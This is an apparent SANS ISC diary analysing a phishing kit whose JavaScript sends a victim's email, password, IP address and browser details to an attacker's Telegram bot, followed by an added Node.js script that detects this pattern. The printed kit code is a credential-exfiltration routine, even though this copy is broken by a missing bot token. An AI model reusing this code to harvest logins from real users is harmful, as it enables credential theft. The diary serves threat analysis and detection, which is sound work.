Phishing kits are not new, they are plentiful in the wild, and my honeypot collects many samples daily. Usually, a phishing kit collects credentials and sends them to a compromised server (WordPress sites are a favourite place to host this kind of malicious code). More recently, I found many kits that (ab)use online services to receive the data submitted via HTTP forms[1].
Today, I spotted a phishing campaign that exfiltrates the collected credentials through a Telegram bot! Telegram bots are common in malicious Python scripts but less common in phishing campaigns. The fake login page is pretty simple.
Everything happens through a piece of JavaScript code:
document.getElementById("submitBtn").addEventListener("click", function(e) {
  e.preventDefault();
  var pswd = document.getElementById('password').value;
  if (pswd == null || pswd == "") {
    // Client-side "validation" mimicking the real login page
    document.getElementById('msg').innerHTML = ` Your account password cannot be empty. if you don't remember your password, reset it now. `;
    setTimeout(() => { document.getElementById('msg').innerHTML = ''; }, 3000);
  } else if (pswd.length < 5) {
    document.getElementById('msg').innerHTML = ' Your account password is too short. ';
    setTimeout(() => { document.getElementById('msg').innerHTML = ''; document.getElementById("submitBtn").reset(); }, 3000);
  } else {
    // The victim's IP address is read from an element filled in elsewhere on the page
    var IP = document.getElementById('gfg').textContent;
    // Message as it will appear in the attacker's Telegram chat
    var message = `====== Office Excel ======\r\nEmail: ${email}\r\nPassword: ${pswd}\r\nIP: https://ip-api.com/${IP}\r\nUser-Agent: ${navigator.userAgent}\r\n===================`;
    var settings = {
      "async": true,
      "crossDomain": true,
      // "token" is never defined anywhere in the kit (see below)
      "url": "https://api.telegram.org/bot" + token + "/sendMessage",
      "method": "POST",
      "headers": {"Content-Type": "application/json", "cache-control": "no-cache"},
      "data": JSON.stringify({"chat_id": chat_id, "text": message})
    }
    $.ajax(settings).done((response) => {
      // Whatever happens, tell the victim the password was wrong
      document.getElementById("password").value = "";
      document.getElementById('msg').innerHTML = ` Your account or password is incorrect. if you don't remember your password, reset it now. `;
      setTimeout(() => { document.getElementById('msg').innerHTML = ''; }, 3000);
    });
  }
});
If the victim provides a password (at least five characters long), the interesting data (email address, password, IP address and User-Agent) are posted to a Telegram bot via a simple HTTP request built in JavaScript: a POST to https://api.telegram.org/bot<token>/sendMessage with a JSON body carrying the chat_id of the attacker's chat and the message text. However, the script has a big issue. A token is required to "talk" to the Telegram bot (the "token" variable concatenated into the URL above), but the token is never defined in the script, so the request can never reach the attacker's chat and the kit is unusable as deployed. Yes, attackers make mistakes too! Note that in a working kit of this kind, both the bot token and the chat_id are shipped to the victim's browser in clear text and are visible to anyone who reads the page source, and a browser POST to api.telegram.org from a page that looks like a Microsoft login is a good signal for detection.
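As an added triage helper (written for this edit, not code from the diary or from the phishing kit), the following Node.js script scans kit JavaScript for Telegram Bot API exfiltration and reports whether the bot token and chat_id the sendMessage call needs are actually defined, so the "token never assigned" mistake above is flagged automatically. The two kit excerpts it runs on are constructed for the example and modelled on the snippet above; the chat_id and token values are placeholders, and the token-shape regex ("<numeric bot id>:<35-character secret>") is an assumption used as a format check only, not a validation against Telegram.

```javascript
'use strict';
// Added triage helper: not code from the diary or from the phishing kit.
// It scans kit JavaScript for Telegram Bot API exfiltration and reports
// whether the bot token and chat_id the request needs are actually defined.

// The kit posts to https://api.telegram.org/bot<token>/sendMessage
const TELEGRAM_API_RE = /api\.telegram\.org\/bot/;
// Token shape "<numeric bot id>:<35-char secret>"; assumption, format check only
const TOKEN_SHAPE_RE = /^\d{8,10}:[A-Za-z0-9_-]{35}$/;
// Token concatenated as a variable: ".../bot" + token + "/sendMessage"
const TOKEN_VAR_RE = /api\.telegram\.org\/bot["'`]\s*\+\s*([A-Za-z_$][\w$]*)/;
// Token pasted straight into the URL string
const TOKEN_INLINE_RE = /api\.telegram\.org\/bot(\d{8,10}:[A-Za-z0-9_-]{35})/;
// chat_id given as a variable or as a literal in the JSON body
const CHAT_VAR_RE = /["']?chat_id["']?\s*:\s*([A-Za-z_$][\w$]*)/;
const CHAT_LITERAL_RE = /["']?chat_id["']?\s*:\s*["']?(-?\d+)["']?/;

// Value of the first `name = "..."` (or '...' / `...`) assignment in src, else null.
function findStringAssignment(src, name) {
  const ident = name.replace(/\$/g, () => '\\$');
  const re = new RegExp('(?:^|[^\\w$])' + ident + '\\s*=\\s*(["\'`])([^"\'`]*)\\1');
  const m = src.match(re);
  return m ? m[2] : null;
}

function analyzeKit(src) {
  const report = { usesTelegram: false, tokenVar: null, token: null,
                   tokenWellFormed: false, chatId: null, verdict: 'no-telegram' };
  if (!TELEGRAM_API_RE.test(src)) return report;
  report.usesTelegram = true;

  const inline = src.match(TOKEN_INLINE_RE);
  const viaVar = src.match(TOKEN_VAR_RE);
  if (inline) {
    report.token = inline[1];
  } else if (viaVar) {
    report.tokenVar = viaVar[1];
    report.token = findStringAssignment(src, viaVar[1]); // null when never assigned
  }
  report.tokenWellFormed = report.token !== null && TOKEN_SHAPE_RE.test(report.token);

  const chatLit = src.match(CHAT_LITERAL_RE);
  const chatVar = src.match(CHAT_VAR_RE);
  if (chatLit) report.chatId = chatLit[1];
  else if (chatVar) report.chatId = findStringAssignment(src, chatVar[1]);

  // Without a well-formed token the sendMessage call cannot reach any chat.
  report.verdict = report.tokenWellFormed ? 'telegram-exfil-armed' : 'telegram-exfil-inoperable';
  return report;
}

// Constructed excerpt modelled on the diary's kit: `token` is used but never assigned
// (email and jQuery's $ come from elsewhere in the page, as in the real kit).
const BROKEN_KIT = [
  'var chat_id = "-1001234567890";',  // constructed chat id, not from the kit
  'var message = "Email: " + email + " Password: " + pswd + " UA: " + navigator.userAgent;',
  'var settings = {',
  '  "url": "https://api.telegram.org/bot" + token + "/sendMessage",',
  '  "method": "POST",',
  '  "headers": {"Content-Type": "application/json"},',
  '  "data": JSON.stringify({"chat_id": chat_id, "text": message})',
  '};',
  '$.ajax(settings);',
].join('\n');

// Same excerpt with a token assigned; the value is a placeholder of the right shape.
const ARMED_KIT = 'var token = "123456789:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi";\n' + BROKEN_KIT;

if (typeof require !== 'undefined' && require.main === module) {
  console.log('broken:', analyzeKit(BROKEN_KIT));
  console.log('armed: ', analyzeKit(ARMED_KIT));
}
```

Run it with `node` on a saved kit by replacing the constructed samples with the file contents; the regexes are deliberately loose (string concatenation and inline tokens, quoted or bare chat_id keys) because kits are copied and lightly edited rather than rewritten, and a verdict of telegram-exfil-inoperable is the case this diary describes.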
[Note] This technique is not new and was already covered in another diary by Johannes[2], but the code is different here and the big mistake is funny!
[1] https://isc.sans.edu/diary/InfoStealer+Using+webhooksite+to+Exfiltrate+Data/28088
[2] https://isc.sans.edu/diary/Simple+HTML+Phishing+via+Telegram+Bot/29528
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.